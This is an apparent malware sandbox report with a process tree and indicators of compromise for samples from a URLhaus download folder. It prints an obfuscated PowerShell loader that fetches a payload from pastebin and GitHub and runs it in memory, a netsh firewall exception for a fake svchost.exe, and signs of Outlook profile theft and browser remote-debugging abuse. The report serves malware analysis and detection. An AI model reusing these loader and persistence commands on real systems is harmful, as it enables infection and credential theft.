5496	FACTURA09876567000.bat
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe
5392	taskmgr.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
1704	PCclear_Eng_mini.exe
1704	PCclear_Eng_mini.exe
5588	ipscan221.exe
5588	ipscan221.exe
5816	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
3048	OpenWith.exe
3192	mstsc.exe
2332	me.exe
2332	me.exe
2208	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2476 wrote to memory of 3516	2476	take3.exe	79
PID 2476 wrote to memory of 3516	2476	take3.exe	79
PID 3516 wrote to memory of 1660	3516	take3.exe	80
PID 3516 wrote to memory of 1660	3516	take3.exe	80
PID 3516 wrote to memory of 1660	3516	take3.exe	80
PID 3516 wrote to memory of 4160	3516	take3.exe	81
PID 3516 wrote to memory of 4160	3516	take3.exe	81
PID 4160 wrote to memory of 2940	4160	WScript.exe	82
PID 4160 wrote to memory of 2940	4160	WScript.exe	82
PID 2940 wrote to memory of 3124	2940	powershell.exe	84
PID 2940 wrote to memory of 3124	2940	powershell.exe	84
PID 3124 wrote to memory of 860	3124	powershell.exe	85
PID 3124 wrote to memory of 860	3124	powershell.exe	85
PID 3124 wrote to memory of 2880	3124	powershell.exe	86
PID 3124 wrote to memory of 2880	3124	powershell.exe	86
PID 3516 wrote to memory of 2372	3516	take3.exe	87
PID 3516 wrote to memory of 2372	3516	take3.exe	87
PID 3516 wrote to memory of 2372	3516	take3.exe	87
PID 2372 wrote to memory of 3100	2372	gvndxfghs.exe	88
PID 2372 wrote to memory of 3100	2372	gvndxfghs.exe	88
PID 2372 wrote to memory of 3100	2372	gvndxfghs.exe	88
PID 2372 wrote to memory of 3100	2372	gvndxfghs.exe	88
PID 2372 wrote to memory of 3100	2372	gvndxfghs.exe	88
PID 2372 wrote to memory of 3100	2372	gvndxfghs.exe	88
PID 2372 wrote to memory of 3100	2372	gvndxfghs.exe	88
PID 2372 wrote to memory of 3100	2372	gvndxfghs.exe	88
PID 2372 wrote to memory of 3100	2372	gvndxfghs.exe	88
PID 2372 wrote to memory of 4576	2372	gvndxfghs.exe	89
PID 2372 wrote to memory of 4576	2372	gvndxfghs.exe	89
PID 2372 wrote to memory of 4576	2372	gvndxfghs.exe	89
PID 2372 wrote to memory of 4576	2372	gvndxfghs.exe	89
PID 2372 wrote to memory of 4576	2372	gvndxfghs.exe	89
PID 2372 wrote to memory of 4576	2372	gvndxfghs.exe	89
PID 2372 wrote to memory of 4576	2372	gvndxfghs.exe	89
PID 2372 wrote to memory of 4576	2372	gvndxfghs.exe	89
PID 2372 wrote to memory of 4576	2372	gvndxfghs.exe	89
PID 2372 wrote to memory of 4516	2372	gvndxfghs.exe	90
PID 2372 wrote to memory of 4516	2372	gvndxfghs.exe	90
PID 2372 wrote to memory of 4516	2372	gvndxfghs.exe	90
PID 2372 wrote to memory of 4516	2372	gvndxfghs.exe	90
PID 2372 wrote to memory of 4516	2372	gvndxfghs.exe	90
PID 2372 wrote to memory of 4516	2372	gvndxfghs.exe	90
PID 2372 wrote to memory of 4516	2372	gvndxfghs.exe	90
PID 2372 wrote to memory of 4516	2372	gvndxfghs.exe	90
PID 2372 wrote to memory of 4516	2372	gvndxfghs.exe	90
PID 3516 wrote to memory of 4912	3516	take3.exe	91
PID 3516 wrote to memory of 4912	3516	take3.exe	91
PID 3516 wrote to memory of 4912	3516	take3.exe	91
PID 3124 wrote to memory of 4408	3124	powershell.exe	95
PID 3124 wrote to memory of 4408	3124	powershell.exe	95
PID 1660 wrote to memory of 4524	1660	dsd.exe	96
PID 1660 wrote to memory of 4524	1660	dsd.exe	96
PID 1660 wrote to memory of 4524	1660	dsd.exe	96
PID 3516 wrote to memory of 4540	3516	take3.exe	97
PID 3516 wrote to memory of 4540	3516	take3.exe	97
PID 3516 wrote to memory of 3544	3516	take3.exe	99
PID 3516 wrote to memory of 3544	3516	take3.exe	99
PID 3516 wrote to memory of 3756	3516	take3.exe	101
PID 3516 wrote to memory of 3756	3516	take3.exe	101
PID 3516 wrote to memory of 3756	3516	take3.exe	101
PID 4524 wrote to memory of 3848	4524	svchost.exe	102
PID 4524 wrote to memory of 3848	4524	svchost.exe	102
PID 4524 wrote to memory of 3848	4524	svchost.exe	102
PID 3516 wrote to memory of 4892	3516	take3.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

Hidden Files and Directories

T1564.001

pid	Process
5680	attrib.exe
2472	attrib.exe
1880	attrib.exe
2292	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	gvndxfghs.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	gvndxfghs.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3264
- C:\Users\Admin\AppData\Local\Temp\take3.exe
  "C:\Users\Admin\AppData\Local\Temp\take3.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2476
- - C:\Users\Admin\AppData\Local\Temp\take3.exe
    "C:\Users\Admin\AppData\Local\Temp\take3.exe"
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3516
  - - C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1660
    - - C:\Users\Admin\AppData\Roaming\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4524
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3848
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4160
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹QQBk☹HY☹OQBn☹EI☹S☹Bh☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bo☹G4☹a☹Bu☹HY☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹awBq☹GE☹dwBz☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹GE☹bwB1☹GY☹c☹☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹YQBv☹HU☹ZgBw☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹JwBj☹G0☹cg☹x☹HY☹cw☹v☹G4☹aQBh☹G0☹LwBz☹GQ☹YQBl☹Gg☹LwBz☹GY☹ZQBy☹C8☹ZQBy☹Gk☹Zg☹v☹GE☹b☹Bs☹Gk☹dQBx☹G4☹YQBy☹HI☹YQBi☹DQ☹Mg☹w☹DI☹bgBv☹Gk☹c☹Bt☹GE☹a☹Bj☹C8☹bQBv☹GM☹LgB0☹G4☹ZQB0☹G4☹bwBj☹HI☹ZQBz☹HU☹YgB1☹Gg☹d☹Bp☹Gc☹LgB3☹GE☹cg☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Gs☹agBh☹Hc☹cw☹g☹Cw☹I☹☹n☹Hc☹aQBu☹DY☹N☹Bi☹Gk☹d☹☹n☹Cw☹I☹☹k☹Gg☹bgBo☹G4☹dg☹s☹C☹☹Jw☹x☹Cc☹L☹☹g☹Cc☹UgBv☹GQ☹YQ☹n☹C☹☹KQ☹p☹Ds☹';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs');powershell $Yolopolhggobek;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2940
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/Adv9gBHa' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hnhnv = '0' ;$kjaws = 'C:\Users\Admin\Downloads\UrlHausFiles\aa.vbs' ;[Byte[]] $aoufp = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($aoufp).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('cmr1vs/niam/sdaeh/sfer/erif/alliuqnarrab4202noipmahc/moc.tnetnocresubuhtig.war//:sptth' , $kjaws , 'win64bit', $hnhnv, '1', 'Roda' ));"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3124
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c
        7⤵
        
        PID:860
        
        C:\Windows\system32\PING.EXE
        
        "C:\Windows\system32\PING.EXE" 127.0.0.1
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4408
  - - C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2372
    - - C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
        
        C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:3100
    - - C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
        
        C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
        5⤵
        Executes dropped EXE
        
        PID:4576
    - - C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
        
        C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe
        5⤵
        Executes dropped EXE
        
        PID:4516
  - - C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4912
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 764
        5⤵
        Program crash
        
        PID:4752
  - - C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\nc64.exe"
      4⤵
      Executes dropped EXE
      PID:4540
  - - C:\Users\Admin\Downloads\UrlHausFiles\bp.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"
      4⤵
      Executes dropped EXE
      PID:3544
  - - C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3756
  - - C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
      "C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4892
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4120
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe070acc40,0x7ffe070acc4c,0x7ffe070acc58
        6⤵
        
        PID:3344
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1780,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1792 /prefetch:2
        6⤵
        
        PID:3328
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1976,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2080 /prefetch:3
        6⤵
        
        PID:2404
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:8
        6⤵
        
        PID:2880
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:228
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3996
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4708
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:8
        6⤵
        
        PID:1944
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
        6⤵
        
        PID:2428
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4728,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5104 /prefetch:8
        6⤵
        
        PID:2480
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5168,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5164 /prefetch:8
        6⤵
        
        PID:5048
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:8
        6⤵
        
        PID:1940
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5312 /prefetch:8
        6⤵
        
        PID:3920
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5352,i,8125273939583029072,12481615534834261687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5216 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:1844
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:884
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe070b3cb8,0x7ffe070b3cc8,0x7ffe070b3cd8
        6⤵
        
        PID:4852
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1852 /prefetch:2
        6⤵
        
        PID:2484
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4772
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
